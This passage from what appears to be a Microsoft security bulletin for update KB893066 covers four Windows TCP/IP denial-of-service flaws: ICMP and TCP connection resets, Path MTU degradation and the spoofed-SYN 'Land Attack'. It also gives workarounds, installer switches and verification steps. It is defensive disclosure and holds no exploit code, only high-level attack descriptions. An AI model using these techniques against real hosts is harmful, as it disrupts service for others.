Fragmentation reduces TCP throughput and increases network congestion.\r\n\r\nFAQ for ICMP Connection Reset Vulnerability - CAN-2004-0790:\r\n\r\nWhat is the scope of the vulnerability?\r\n\r\nA denial of service vulnerability exists that could allow an attacker to send a specially crafted ICMP message to an affected system. An attacker who successfully exploited this vulnerability could cause the affected system to reset existing TCP connections. Those connections would have to be re-established for normal communication to continue. Note that the denial of service vulnerability would not allow an attacker to execute code or elevate their user rights.\r\n\r\nWhat causes the vulnerability?\r\nIn certain cases the affected messages are not ignored, which allows an attacker to send a malformed packet that may reset an existing connection.\r\n\r\nWhat is TCP/IP?\r\nTCP/IP is a set of networking protocols that are widely used on the Internet. TCP/IP provides communications across interconnected networks of computers that have diverse hardware architectures and that run various operating systems. TCP/IP includes standards for how computers communicate and conventions for connecting networks and for routing traffic. For more information about TCP/IP, see the following Microsoft Web site.\r\n\r\nWhat is ICMP?\r\nInternet Control Message Protocol (ICMP) is a required TCP/IP standard that is defined in RFC 792, "Internet Control Message Protocol (ICMP)." 
Hosts and routers that use IP communication can report errors and exchange limited control and status information using ICMP.\r\n\r\nICMP messages are usually sent automatically in one of the following situations:\r\n\u2022 An IP datagram cannot reach its destination.\r\n\u2022 An IP router (gateway) cannot forward datagrams at the current rate of transmission.\r\n\u2022 An IP router redirects the sending host to a better route to the destination.\r\n\r\nYou can use the ping command to send ICMP echo request messages and to record the receipt of ICMP echo reply messages. By using these messages, you can detect network or host communication failures and troubleshoot common TCP/IP connectivity problems. For more information about ICMP, see the following Microsoft Web site.\r\n\r\nWhat might an attacker use the vulnerability to do?\r\nAn attacker who exploited this vulnerability could cause the affected system to reset TCP connections.\r\n\r\nWho could exploit the vulnerability?\r\nAny anonymous user who could deliver a specially crafted message to the affected system could try to exploit this vulnerability.\r\n\r\nHow could an attacker exploit the vulnerability?\r\nAn attacker could exploit the vulnerability by creating a specially crafted message and sending the message to an affected system. The message could then cause the affected system to reset network connections.\r\n\r\nWhat systems are primarily at risk from the vulnerability?\r\nAll affected operating systems are at risk from this vulnerability. However, servers are at primary risk from this vulnerability because they maintain connections with clients that could be vulnerable to the connection reset.\r\n\r\nCould the vulnerability be exploited over the Internet?\r\nYes. An attacker could try to exploit this vulnerability over the Internet. 
By default, the Microsoft Internet Connection Firewall (ICF) allows these kinds of malicious network packets and cannot be used to filter them.\r\n\r\nWhat does the update do?\r\nThe update removes the vulnerability by modifying the way that the affected operating systems validate ICMP requests.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed?\r\nYes. This vulnerability has been publicly disclosed. It has been assigned Common Vulnerability and Exposure number CAN-2004-0790. There is a variant of this issue that has been assigned Common Vulnerability and Exposure number CAN-2004-0791. The Microsoft security update for CAN-2004-0790 happens to also address CAN-2004-0791.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited?\r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers and had not seen any examples of proof of concept code published when this security bulletin was originally issued.\r\n\r\nICMP Path MTU Vulnerability - CAN-2004-1060:\r\n\r\nA denial of service vulnerability exists that could allow an attacker to send a specially crafted Internet Control Message Protocol (ICMP) message to an affected system that could cause network performance to degrade and potentially stop the affected system from responding to requests.\r\n\r\nMitigating Factors for ICMP Path MTU Vulnerability - CAN-2004-1060:\r\n\u2022 Firewall best practices and firewall or router configurations that block all ICMP traffic can help protect networks from attacks that originate outside the enterprise perimeter. 
Best practices recommend that systems that are connected to the Internet have a minimal number of ports exposed.\r\n\u2022 For an attacker to try to exploit this vulnerability, they must first predict or learn the IP address information of the source and of the destination of an existing TCP network connection.\r\n\r\nWorkarounds for ICMP Path MTU Vulnerability - CAN-2004-1060:\r\n\r\nMicrosoft has tested the following workarounds. While these workarounds will not correct the underlying vulnerability, they help block known attack vectors. When a workaround reduces functionality, it is identified in the following section.\r\n\u2022 Disable Path MTU Discovery.\r\nDisabling Path MTU Discovery prevents an attacker from specifying a low MTU value that could degrade network performance. To disable it, follow these steps:\r\n\r\nNote Using Registry Editor incorrectly can cause serious problems that may require you to reinstall your operating system. Microsoft cannot guarantee that problems resulting from the incorrect use of Registry Editor can be solved. Use Registry Editor at your own risk. For information about how to edit the registry, view the "Changing Keys And Values" Help topic in Registry Editor (Regedit.exe) or view the "Add and Delete Information in the Registry" and "Edit Registry Data" Help topics in Regedt32.exe.\r\n\r\nNote We recommend backing up the registry before you edit it.\r\n\r\n1. Click Start, click Run, type "regedt32" (without the quotation marks), and then click OK.\r\n\r\n2. In Registry Editor, locate the following registry key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\r\n\r\n3. Add the DWORD Value: EnablePMTUDiscovery. Set the value to 0. This value disables Path MTU Discovery. 
By default, this key does not exist.\r\n\r\n4. You must restart your system for this change to take effect.\r\n\r\nImpact of Workaround: These changes help prevent attacks by restricting the ability of an attacker to reduce the Path MTU value to a low value. This setting can also negatively impact performance by preventing TCP from optimizing network communication. This optimization can eliminate fragmentation at routers connecting networks with different MTUs. Fragmentation reduces TCP throughput and increases network congestion. For more information about EnablePMTUDiscovery, see the following Web site.\r\n\u2022 Block all ICMP network packets at the firewall or at the router:\r\n\r\nICMP network packets are used to initiate a connection with the affected components. Blocking them at the firewall or at the router will help protect systems that are behind that firewall or router from attempts to exploit this vulnerability. We recommend that you block all unsolicited inbound communication from the Internet. ISA Server 2000 and ISA Server 2004 can be used to block the affected types of traffic.\r\n\r\nImpact of Workaround: This workaround can also negatively impact performance by preventing TCP from optimizing network communication. ICMP network packets can eliminate fragmentation at routers connecting networks with different MTUs. Fragmentation reduces TCP throughput and increases network congestion.\r\n\u2022 Block ICMP traffic by using IPSec on the affected systems.\r\n\r\nUse Internet Protocol security (IPSec) to help protect network communications. Detailed information about IPSec and about how to apply filters is available in Microsoft Knowledge Base Article 313190 and Microsoft Knowledge Base Article 813878.\r\n\r\nImpact of Workaround: This workaround can also negatively impact performance by preventing TCP from optimizing network communication. 
ICMP network packets can eliminate fragmentation at routers connecting networks with different MTUs. Fragmentation reduces TCP throughput and increases network congestion.\r\n\r\nFAQ for ICMP Path MTU Vulnerability - CAN-2004-1060:\r\n\r\nWhat is the scope of the vulnerability?\r\n\r\nA denial of service vulnerability exists that could allow an attacker to send a specially crafted Internet Control Message Protocol (ICMP) message to an affected system that could cause network performance to degrade and potentially stop the affected system from responding to requests. Note that the denial of service vulnerability would not allow an attacker to execute code or elevate their user rights.\r\n\r\nWhat causes the vulnerability?\r\nThe ICMP Path MTU Discovery process allows an attacker to specify a Path MTU value that can degrade network performance.\r\n\r\nWhat is TCP/IP?\r\nTCP/IP is a set of networking protocols that are widely used on the Internet. TCP/IP provides communications across interconnected networks of computers that have diverse hardware architectures and that run various operating systems. TCP/IP includes standards for how computers communicate and conventions for connecting networks and for routing traffic. For more information about TCP/IP, see the following Microsoft Web site.\r\n\r\nWhat is ICMP?\r\nInternet Control Message Protocol (ICMP) is a required TCP/IP standard that is defined in RFC 792, "Internet Control Message Protocol (ICMP)." 
Hosts and routers that use IP communication can report errors and exchange limited control and status information using ICMP.\r\n\r\nICMP messages are usually sent automatically in one of the following situations:\r\n\u2022 An IP datagram cannot reach its destination.\r\n\u2022 An IP router (gateway) cannot forward datagrams at the current rate of transmission.\r\n\u2022 An IP router redirects the sending host to a better route to the destination.\r\n\r\nYou can use the ping command to send ICMP echo request messages and to record the receipt of ICMP echo reply messages. By using these messages, you can detect network or host communication failures and troubleshoot common TCP/IP connectivity problems. For more information about ICMP, see the following Microsoft Web site.\r\n\r\nWhat is Path MTU Discovery?\r\nPath maximum transmission unit (PMTU) discovery is the process of discovering the maximum size of packet that can be sent across the network between two hosts without fragmentation (that is, without the packet being broken into multiple frames during transmission). It is described in RFC 1191. For more information, see RFC 1191. For additional information, see the following MSDN Web site.\r\n\r\nWhat is wrong with the Path MTU Discovery process?\r\nPath maximum transmission unit (PMTU) discovery allows an attacker to specify a value that can degrade network performance for other connections. On unsecured networks, allowing PMTU discovery carries the risk that an attacker might force the MTU to a very small value and overwork the local system's TCP/IP stack. Normally this behavior would be restricted to the single connection that an attacker could establish. 
However, this vulnerability allows an attacker to modify the MTU value on other connections beyond their own connection to the affected system.\r\n\r\nWhat might an attacker use the vulnerability to do?\r\nAn attacker who exploited this vulnerability could cause the affected system to degrade network performance.\r\n\r\nWho could exploit the vulnerability?\r\nAny anonymous user who could deliver a specially crafted message to the affected system could try to exploit this vulnerability.\r\n\r\nHow could an attacker exploit the vulnerability?\r\nAn attacker could exploit the vulnerability by creating a specially crafted message and sending the message to an affected system. The message could then cause the affected system to degrade network performance.\r\n\r\nWhat systems are primarily at risk from the vulnerability?\r\nAll affected operating systems are at risk from this vulnerability. However, servers are at primary risk from this vulnerability because they maintain connections with clients that could be vulnerable to performance degradation.\r\n\r\nCould the vulnerability be exploited over the Internet?\r\nYes. An attacker could try to exploit this vulnerability over the Internet. By default, the Microsoft Internet Connection Firewall (ICF) allows these kinds of malicious network packets and cannot be used to filter them.\r\n\r\nWhat does the update do?\r\nThe update removes the vulnerability by restricting the minimum value of the MTU to 576 bytes. This update also modifies the way that the affected operating systems validate ICMP requests.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed?\r\nYes. This vulnerability has been publicly disclosed. It has been assigned Common Vulnerability and Exposure number CAN-2004-1060.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited?\r\nNo. 
Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers and had not seen any examples of proof of concept code published when this security bulletin was originally issued.\r\n\r\nTCP Connection Reset Vulnerability - CAN-2004-0230:\r\n\r\nA denial of service vulnerability exists that could allow an attacker to send a specially crafted TCP message to an affected system. An attacker who successfully exploited this vulnerability could cause the affected system to reset existing TCP connections.\r\n\r\nMitigating Factors for TCP Connection Reset Vulnerability - CAN-2004-0230:\r\n\u2022 For an attacker to try to exploit this vulnerability, they must first predict or learn the IP address and port information of the source and of the destination of an existing TCP network connection. An attacker would also have to predict or to learn certain difficult TCP network packet details. Protocols or programs that maintain long sessions and have predictable TCP/IP information are at an increased risk for this issue.\r\n\u2022 Firewall best practices and standard default firewall configurations can help protect networks from attacks that originate outside the enterprise perimeter. Best practices recommend that systems that are connected to the Internet have a minimal number of ports exposed. Affected systems that allow any TCP connections to the Internet may be vulnerable to this issue.\r\n\u2022 This attack would have to be performed on each TCP connection that was targeted for reset. 
Many applications will automatically restore connections that have been reset.\r\n\r\nWorkarounds for TCP Connection Reset Vulnerability - CAN-2004-0230:\r\n\r\nWe have not identified any workarounds for this vulnerability.\r\n\r\nFAQ for TCP Connection Reset Vulnerability - CAN-2004-0230:\r\n\r\nWhat is the scope of the vulnerability?\r\n\r\nA denial of service vulnerability exists that could allow an attacker to send a specially crafted TCP message to an affected system. An attacker who successfully exploited this vulnerability could cause the affected system to reset existing TCP connections. Those connections would have to be reestablished for normal communication to continue. Note that the denial of service vulnerability would not allow an attacker to execute code or to elevate their user rights.\r\n\r\nWhat causes the vulnerability?\r\nIn certain cases the affected messages are not ignored, which allows an attacker to send a malformed TCP packet that may reset an existing connection.\r\n\r\nWhat is TCP/IP?\r\nTCP/IP is a set of networking protocols that are widely used on the Internet. TCP/IP provides communications across interconnected networks of computers that have diverse hardware architectures and that run various operating systems. TCP/IP includes standards for how computers communicate and conventions for connecting networks and for routing traffic. 
For more information about TCP/IP, see the following Microsoft Web site.\r\n\r\nWhat might an attacker use the vulnerability to do?\r\nAn attacker who exploited this vulnerability could cause the affected system to reset TCP connections.\r\n\r\nWho could exploit the vulnerability?\r\nAny anonymous user who could deliver a specially crafted message to the affected system and learn or predict the required TCP details could try to exploit this vulnerability.\r\n\r\nHow could an attacker exploit the vulnerability?\r\nAn attacker could exploit the vulnerability by creating a specially crafted message and sending the message to an affected system. The message could then cause the affected system to reset TCP connections.\r\n\r\nFor an attacker to try to exploit this vulnerability, they must first predict or learn the IP address and port information of the source and of the destination of an existing TCP network connection. An attacker would also have to predict or learn certain difficult TCP network packet details.\r\n\r\nWhat systems are primarily at risk from the vulnerability?\r\nAll affected operating systems are at risk from this vulnerability. However, servers are at primary risk from this vulnerability because they maintain connections with clients that could be vulnerable to the connection reset. Protocols or programs that maintain long sessions and have predictable TCP/IP information are at an increased risk for this issue.\r\n\r\nCould the vulnerability be exploited over the Internet?\r\nYes. An attacker could try to exploit this vulnerability over the Internet.\r\n\r\nWhat does the update do?\r\nThe update removes the vulnerability by modifying the way that the affected operating systems validate TCP requests.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed?\r\nYes. This vulnerability has been publicly disclosed. 
It has been assigned Common Vulnerability and Exposure number CAN-2004-0230.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited?\r\nNo. Microsoft had seen examples of proof of concept code published publicly but had not received any information to indicate that this vulnerability had been publicly used to attack customers when this security bulletin was originally issued.\r\n\r\nDoes applying this security update help protect customers from the code that has been published publicly that attempts to exploit this vulnerability?\r\nYes. This security update addresses the proof of concept code that has been publicly published. The vulnerability that has been addressed has been assigned the Common Vulnerability and Exposure number CAN-2004-0230.\r\n\r\nSpoofed Connection Request Vulnerability - CAN-2005-0688:\r\n\r\nA denial of service vulnerability exists that could allow an attacker to send a specially crafted TCP/IP message to an affected system. An attacker who successfully exploited this vulnerability could cause the affected system to stop responding.\r\n\r\nMitigating Factors for Spoofed Connection Request Vulnerability - CAN-2005-0688:\r\n\u2022 The affected system would function as normal after the malicious packets are finished processing.\r\n\u2022 This attack requires that routers forward malformed TCP/IP network packets. Most routers will not forward these kinds of malformed TCP/IP network packets.\r\n\u2022 Firewall best practices and standard default firewall configurations can help protect networks from attacks that originate outside the enterprise perimeter. Best practices recommend that systems that are connected to the Internet have a minimal number of ports exposed. 
Affected systems that allow any IP connections to the Internet may be vulnerable to this issue.\r\n\u2022 Windows Server 2003 systems that have enabled the SynAttackProtect registry value are not vulnerable to this issue. For information on how to enable this registry value, see the \u201cWorkarounds\u201d section of this vulnerability. This registry value does not protect other affected operating systems.\r\n\r\nWorkarounds for Spoofed Connection Request Vulnerability - CAN-2005-0688:\r\n\u2022 ISA Server 2000 and ISA Server 2004 can be used to block the affected types of traffic. Please review the ISA Server Preventative Measures Documentation for more information on how to use ISA Server to help mitigate this vulnerability.\r\n\u2022 Enabling the SynAttackProtect registry value on Windows Server 2003 will mitigate this vulnerability. Windows Server 2003 systems that have enabled this registry value are not vulnerable to this issue. Microsoft recommends that customers enable this registry value. For information on how to enable this registry value, see the following Microsoft Web site. This registry value does not protect other affected operating systems.\r\n\r\nFAQ for Spoofed Connection Request Vulnerability - CAN-2005-0688:\r\n\r\nWhat is the scope of the vulnerability?\r\n\r\nThis is a denial of service vulnerability. An attacker who exploited this vulnerability could cause the affected system to stop responding for a limited time. During that time, affected systems cannot respond to requests. Note that the denial of service vulnerability would not allow an attacker to execute code or elevate their user rights, but it could cause the affected system to stop accepting requests.\r\n\r\nWhat causes the vulnerability?\r\nThe affected operating systems perform incomplete validation of TCP/IP network packets. 
This vulnerability occurs when a Transmission Control Protocol (TCP) SYN packet is received with a spoofed source Internet Protocol (IP) address and port number that is identical to that of the destination IP address and port. The effect of this makes it appear that the host computer has sent a packet to itself. If this attack is successful, a loop is created and extra computer CPU time is used.\r\n\r\nWhat is TCP/IP?\r\nTCP/IP is a set of networking protocols that are widely used on the Internet. TCP/IP provides communications across interconnected networks of computers that have diverse hardware architectures and that run various operating systems. TCP/IP includes standards for how computers communicate and conventions for connecting networks and for routing traffic. For more information about TCP/IP, see the following Microsoft Web site.\r\n\r\nWhat might an attacker use the vulnerability to do?\r\nAn attacker who exploited this vulnerability could cause the affected system to stop responding.\r\n\r\nWho could exploit the vulnerability?\r\nAny anonymous user who could deliver a specially crafted message to the affected system could try to exploit this vulnerability.\r\n\r\nHow could an attacker exploit the vulnerability?\r\nAn attacker could exploit the vulnerability by creating a specially crafted message and sending the message to an affected system. The message could then cause the affected system to stop responding.\r\n\r\nWhat systems are primarily at risk from the vulnerability?\r\nWindows XP Service Pack 2 and Windows Server 2003 are primarily at risk from this vulnerability. Prior operating system versions are not vulnerable to this issue.\r\n\r\nCould the vulnerability be exploited over the Internet?\r\nYes. An attacker could try to exploit this vulnerability over the Internet. However, this attack requires that routers forward malformed TCP/IP network packets. 
Most routers will not forward these kinds of malformed TCP/IP network packets.\r\n\r\nWhat does the update do?\r\nThe update removes the vulnerability by modifying the way that the affected operating systems validate TCP/IP requests.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed?\r\nYes. This vulnerability has been publicly disclosed. It has been assigned Common Vulnerability and Exposure number CAN-2005-0688. It also has been named \u201cLand Attack\u201d by the larger security community.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited?\r\nNo. Microsoft had seen examples of proof of concept code published publicly but had not received any information to indicate that this vulnerability had been publicly used to attack customers when this security bulletin was originally issued.\r\n\r\nDoes applying this security update help protect customers from the code that has been published publicly that attempts to exploit this vulnerability?\r\nYes. 
This security update addresses the vulnerability that is demonstrated by the existing proof of concept code that has been published.\r\n\r\nSecurity Update Information\r\n\r\nAffected Software:\r\n\r\nFor information about the specific security update for your affected software, click the appropriate link:\r\n\r\nWindows Server 2003 (all versions)\r\n\r\nPrerequisites\r\nThis security update requires a release version of Windows Server 2003.\r\n\r\nInclusion in Future Service Packs:\r\nThe update for this issue is included in Windows Server 2003 Service Pack 1.\r\n\r\nInstallation Information\r\n\r\nThis security update supports the following setup switches:\r\nSupported Security Update Installation Switches\r\nSwitch\tDescription\r\n/help\tDisplays the command-line options\r\nSetup Modes\r\n/passive\tUnattended Setup mode. No user interaction is required, but installation status is displayed. If a restart is required at the end of Setup, a dialog box will be presented to the user with a timer warning that the computer will restart in 30 seconds.\r\n/quiet\tQuiet mode - same as unattended mode, but no status or error messages are displayed.\r\nRestart Options\r\n/norestart\tDo not restart when installation has completed\r\n/forcerestart\tRestart the computer after installation and force other applications to close at shutdown without saving open files first.\r\n/warnrestart[:x]\tPresents a dialog box with a timer warning the user that the computer will restart in x seconds. (Default is 30 sec). 
Intended for use with either /quiet or /passive switches.\r\n/promptrestart\tDisplay a dialog box prompting the local user to allow a restart\r\nSpecial Options\r\n/overwriteoem\tOverwrite OEM files without prompting\r\n/nobackup\tDo not back up files needed for uninstall\r\n/forceappsclose\tForce other programs to close when the computer shuts down\r\n/log:path\tAllow the redirection of installation log files\r\n/integrate:path\tIntegrates the update into the Windows source files located at the path specified\r\n/extract[:path]\tExtracts files without starting the Setup program\r\n/ER\tEnable extended error reporting\r\n/verbose\tEnables verbose logging. During installation, creates %Windir%\CabBuild.log. This log details the files that are copied. Using this switch may cause the installation to proceed more slowly.\r\n\r\nNote You can combine these switches into one command. For backward compatibility, the security update also supports the setup switches that the earlier version of the Setup program uses. For more information about the supported installation switches, see Microsoft Knowledge Base Article 262841. 
For more information about the Update.exe installer, visit the Microsoft TechNet Web site.\r\n\r\nDeployment Information\r\n\r\nTo install the security update without any user intervention, use the following command at a command prompt for Windows Server 2003:\r\n\r\nWindowsserver2003-kb893066-x86-enu /quiet\r\n\r\nTo install the security update without forcing the system to restart, use the following command at a command prompt for Windows Server 2003:\r\n\r\nWindowsserver2003-kb893066-x86-enu /norestart\r\n\r\nFor information about how to deploy this security update by using Software Update Services, visit the Software Update Services Web site.\r\n\r\nRestart Requirement\r\n\r\nYou must restart your system after you apply this security update.\r\n\r\nRemoval Information\r\n\r\nTo remove this update, use the Add or Remove Programs tool in Control Panel.\r\n\r\nSystem administrators can also use the Spuninst.exe utility to remove this security update. The Spuninst.exe utility is located in the %Windir%\$NTUninstallKB893066$\Spuninst folder. The Spuninst.exe utility supports the following setup switches:\r\nSupported Spuninst.exe Switches\r\nSwitch\tDescription\r\n/help\tDisplays the command-line options\r\nSetup Modes\r\n/passive\tUnattended setup mode. No user interaction is required, but installation status is displayed. 
If a restart is required at the end of Setup, a dialog box will be presented to the user with a timer warning that the computer will restart in 30 seconds.\r\n/quiet\tQuiet mode - same as unattended setup mode, but no status or error messages are displayed.\r\nRestart Options\r\n/norestart\tDo not restart when installation has completed\r\n/forcerestart\tRestart the computer after installation and force other applications to close at shutdown without saving open files first.\r\n/warnrestart[:x]\tPresents a dialog box with a timer warning the user that the computer will restart in x seconds. (Default is 30 sec). Intended for use with either /quiet or /passive switches.\r\n/promptrestart\tDisplay a dialog box prompting the local user to allow a restart\r\nSpecial Options\r\n/forceappsclose\tForce other programs to close when the computer shuts down\r\n\r\nFile Information\r\n\r\nThe English version of this security update has the file attributes that are listed in the following table. The dates and times for these files are listed in coordinated universal time (UTC). When you view the file information, it is converted to local time. 
To find the difference between UTC and local time, use the Time Zone tab in the Date and Time tool in Control Panel.\r\n\r\nWindows Server 2003, Web Edition; Windows Server 2003, Standard Edition; Windows Server 2003, Enterprise Edition; Windows Server 2003, Datacenter Edition; and Windows Small Business Server 2003:\r\nFile Name\tVersion\tDate\tTime\tSize\tFolder\r\nTcpip.sys\t5.2.3790.290\t17-Mar-2005\t05:04\t335,360\tRTMGDR\r\nTcpip.sys\t5.2.3790.290\t17-Mar-2005\t05:03\t336,896\tRTMQFE\r\nUpdspapi.dll\t6.1.22.4\t25-Feb-2005\t03:51\t371,936\r\n\r\nWindows Server 2003, Enterprise Edition for Itanium-based Systems and Windows Server 2003, Datacenter Edition for Itanium-based Systems:\r\nFile Name\tVersion\tDate\tTime\tSize\tFolder\r\nTcpip.sys\t5.2.3790.290\t17-Mar-2005\t03:57\t973,824\tRTMGDR\r\nTcpip.sys\t5.2.3790.290\t17-Mar-2005\t03:57\t977,408\tRTMQFE\r\nUpdspapi.dll\t6.1.22.4\t11-Mar-2005\t17:56\t639,712\r\n\r\nNote When you install this security update on Windows Server 2003, the installer checks to see if one or more of the files that are being updated on your system have previously been updated by a Microsoft hotfix. If you have previously installed a hotfix to update an affected file, the installer copies the RTMQFE files to your system. 
Otherwise, the installer copies the RTMGDR files to your system.\r\n\r\nFor more information about this behavior, see Microsoft Knowledge Base Article 824994.\r\n\r\nFor more information about the Update.exe installer, visit the Microsoft TechNet Web site.\r\n\r\nFor more information about the terminology that appears in this bulletin, such as hotfix, see Microsoft Knowledge Base Article 824684.\r\n\r\nVerifying that the Update Has Been Applied\r\n\u2022\t\r\n\r\nMicrosoft Baseline Security Analyzer\r\n\r\nTo verify that a security update has been applied to an affected system, you may be able to use the Microsoft Baseline Security Analyzer (MBSA) tool. MBSA allows administrators to scan local and remote systems for missing security updates and for common security misconfigurations. For more information about MBSA, visit the Microsoft Baseline Security Analyzer Web site.\r\n\u2022\t\r\n\r\nFile Version Verification\r\n\r\nNote Because there are several versions of Microsoft Windows, the following steps may be different on your computer. 
If they are, see your product documentation to complete these steps.\r\n\r\n1.\r\n\t\r\n\r\nClick Start, and then click Search.\r\n\r\n2.\r\n\t\r\n\r\nIn the Search Results pane, click All files and folders under Search Companion.\r\n\r\n3.\r\n\t\r\n\r\nIn the All or part of the file name box, type a file name from the appropriate file information table, and then click Search.\r\n\r\n4.\r\n\t\r\n\r\nIn the list of files, right-click a file name from the appropriate file information table, and then click Properties.\r\n\r\nNote Depending on the version of the operating system or programs installed, some of the files that are listed in the file information table may not be installed.\r\n\r\n5.\r\n\t\r\n\r\nOn the Version tab, determine the version of the file that is installed on your computer by comparing it to the version that is documented in the appropriate file information table.\r\n\r\nNote Attributes other than the file version may change during installation. Comparing other file attributes to the information in the file information table is not a supported method of verifying that the update has been applied. Also, in certain cases, files may be renamed during installation. 
If the file or version information is not present, use one of the other available methods to verify update installation.\r\n\u2022\t\r\n\r\nRegistry Key Verification\r\n\r\nYou may also be able to verify the files that this security update has installed by reviewing the following registry keys.\r\n\r\nWindows Server 2003, Web Edition; Windows Server 2003, Standard Edition; Windows Server 2003, Enterprise Edition; Windows Server 2003, Datacenter Edition; Windows Small Business Server 2003; Windows Server 2003, Enterprise Edition for Itanium-based Systems; and Windows Server 2003, Datacenter Edition for Itanium-based Systems:\r\n\r\nHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\Windows Server 2003\SP1\KB893066\Filelist\r\n\r\nNote This registry key may not contain a complete list of installed files. Also, this registry key may not be created correctly if an administrator or an OEM integrates or slipstreams the 893066 security update into the Windows installation source files.\r\n\r\n\t\r\nWindows XP (all versions)\r\n\r\nPrerequisites\r\nThis security update requires Microsoft Windows XP Service Pack 1 or a later version. For more information, see Microsoft Knowledge Base Article 322389.\r\n\r\nInclusion in Future Service Packs:\r\nThe update for this issue will be included in a future Service Pack or Update Rollup.\r\n\r\nInstallation Information\r\n\r\nThis security update supports the following setup switches:\r\nSupported Security Update Installation Switches\r\nSwitch\tDescription\r\n\r\n/help\r\n\t\r\n\r\nDisplays the command-line options\r\nSetup Modes\t \r\n\r\n/passive\r\n\t\r\n\r\nUnattended Setup mode. No user interaction is required, but installation status is displayed. 
If a restart is required at the end of Setup, a dialog box will be presented to the user with a timer warning that the computer will restart in 30 seconds.\r\n\r\n/quiet\r\n\t\r\n\r\nQuiet mode - same as unattended mode, but no status or error messages are displayed.\r\nRestart Options\t \r\n\r\n/norestart\r\n\t\r\n\r\nDo not restart when installation has completed\r\n\r\n/forcerestart\r\n\t\r\n\r\nRestart the computer after installation and force other applications to close at shutdown without saving open files first.\r\n\r\n/warnrestart[:x]\r\n\t\r\n\r\nPresents a dialog box with a timer warning the user that the computer will restart in x seconds. (Default is 30 sec). Intended for use with either /quiet or /passive switches.\r\n\r\n/promptrestart\r\n\t\r\n\r\nDisplay a dialog box prompting the local user to allow a restart\r\nSpecial Options\t \r\n\r\n/overwriteoem\r\n\t\r\n\r\nOverwrite OEM files without prompting\r\n\r\n/nobackup\r\n\t\r\n\r\nDo not backup files needed for uninstall\r\n\r\n/forceappsclose\r\n\t\r\n\r\nForce other programs to close when the computer shuts down\r\n\r\n/log:path\r\n\t\r\n\r\nAllow the redirection of installation log files\r\n\r\n/integrate:path\r\n\t\r\n\r\nIntegrates the update into the Windows source files located at the path specified\r\n\r\n/extract[:path]\r\n\t\r\n\r\nExtracts files without starting the Setup program\r\n\r\n/ER\r\n\t\r\n\r\nEnable extended error reporting\r\n\r\n/verbose\r\n\t\r\n\r\nEnables verbose logging. During installation, creates %Windir%\CabBuild.log. This log details the files that are copied. Using this switch may cause the installation to proceed more slowly.\r\n\r\nNote You can combine these switches into one command. For backward compatibility, the security update also supports the setup switches that the earlier version of the Setup program uses. For more information about the supported installation switches, see Microsoft Knowledge Base Article 262841. 
For more information about the Update.exe installer, visit the Microsoft TechNet Web site.\r\n\r\nDeployment Information\r\n\r\nTo install the security update without any user intervention, use the following command at a command prompt for Microsoft Windows XP:\r\n\r\nWindowsxp-kb893066-x86-enu /quiet\r\n\r\nTo install the security update without forcing the system to restart, use the following command at a command prompt for Windows XP:\r\n\r\nWindowsxp-kb893066-x86-enu /norestart\r\n\r\nFor information about how to deploy this security update by using Software Update Services, visit the Software Update Services Web site.\r\n\r\nRestart Requirement\r\n\r\nYou must restart your system after you apply this security update.\r\n\r\nRemoval Information\r\n\r\nTo remove this security update, use the Add or Remove Programs tool in Control Panel.\r\n\r\nSystem administrators can also use the Spuninst.exe utility to remove this security update. The Spuninst.exe utility is located in the %Windir%\$NTUninstallKB893066$\Spuninst folder. The Spuninst.exe utility supports the following setup switches:\r\nSupported Spuninst.exe Switches\r\nSwitch\tDescription\r\n\r\n/help\r\n\t\r\n\r\nDisplays the command-line options\r\nSetup Modes \t \r\n\r\n/passive\r\n\t\r\n\r\nUnattended setup mode. No user interaction is required, but installation status is displayed. 
If a restart is required at the end of Setup, a dialog box will be presented to the user with a timer warning that the computer will restart in 30 seconds.\r\n\r\n/quiet\r\n\t\r\n\r\nQuiet mode - same as unattended setup mode, but no status or error messages are displayed.\r\nRestart Options\t \r\n\r\n/norestart\r\n\t\r\n\r\nDo not restart when installation has completed\r\n\r\n/forcerestart\r\n\t\r\n\r\nRestart the computer after installation and force other applications to close at shutdown without saving open files first.\r\n\r\n/warnrestart[:x]\r\n\t\r\n\r\nPresents a dialog box with a timer warning the user that the computer will restart in x seconds. (Default is 30 sec). Intended for use with either /quiet or /passive switches.\r\n\r\n/promptrestart\r\n\t\r\n\r\nDisplay a dialog box prompting the local user to allow a restart\r\nSpecial Options\t \r\n\r\n/forceappsclose\r\n\t\r\n\r\nForce other programs to close when the computer shuts down\r\n\r\nFile Information\r\n\r\nThe English version of this security update has the file attributes that are listed in the following table. The dates and times for these files are listed in coordinated universal time (UTC). When you view the file information, it is converted to local time. 
